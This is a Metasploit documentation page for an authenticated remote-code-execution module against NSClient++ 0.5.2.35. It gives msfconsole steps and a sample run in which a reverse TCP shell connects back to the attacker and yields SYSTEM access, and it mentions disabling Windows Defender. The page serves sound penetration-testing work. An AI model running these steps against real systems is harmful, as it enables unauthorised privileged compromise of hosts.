ContextQMD
Back to Metasploit Framework

Nscp Authenticated Rce

documentation/modules/exploit/windows/http/nscp_authenticated_rce.md

6.4.1312.3 KB
Original Source

Vulnerable Application

Description

This module allows an attacker with knowledge of the admin password of NSClient++ 0.5.2.35 to start a privileged reverse shell. For this module to work, both web interface of NSClient++ and ExternalScripts feature should be enabled.

Installation

A vulnerable version of NSClient++ can be downloaded from [here]https://nsclient.org/download/). Then you can help yourself with this installation guide to complete the installation. Don't forget to enable the web interface and the ExternalScripts feature to allow the exploit to work.

Verification Steps

List the steps needed to make sure this thing works

  1. Start msfconsole
  2. use exploit/windows/http/nscp_authenticated_rce
  3. set RHOST <target_host>
  4. set PASSWORD <admin_password> to set the admin password of NSClient++ web interface
  5. check to check if the targeted NSClient++ is vulnerable
  6. set payload <choose_a_payload> to set a specific payload to send
  7. run the module to exploit the vulnerability and start a shell

Options

PASSWORD

Set the PASSWORD of the admin account of NSClient++.

Scenarios

This module was successfully tested on Windows 10 Home (you may need to disable Windows Defender as msf payload could be spotted). See the following output :

msf > use nscp_authenticated_rce
[*] Using configured payload windows/x64/shell_reverse_tcp
msf exploit(nscp_authenticated_rce) > set RHOST x.x.x.x
RHOST => x.x.x.x
msf exploit(nscp_authenticated_rce) > set password easypassword
password => easypassword
msf exploit(nscp_authenticated_rce) > exploit

[*] Started reverse TCP handler on y.y.y.y:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Got auth token: frAQBc8Wsa1xVPfvJcrgRYwTiizs2trQ
[+] The target is vulnerable. External scripts feature enabled !
[*] Configuring Script with Specified Payload . . .
[*] Added External Script (name: zqlmwevxef)
[*] Saving Configuration . . .
[*] Reloading Application . . .
[*] Waiting for Application to reload . . .
[*] Triggering payload, should execute shortly . . .
[*] Command shell session 21750 opened (y.y.y.y:4444 -> x.x.x.x:51026) at 2021-06-08 16:54:39 +0200

C:\Program Files\NSClient++>whoami
whoami
nt authority\system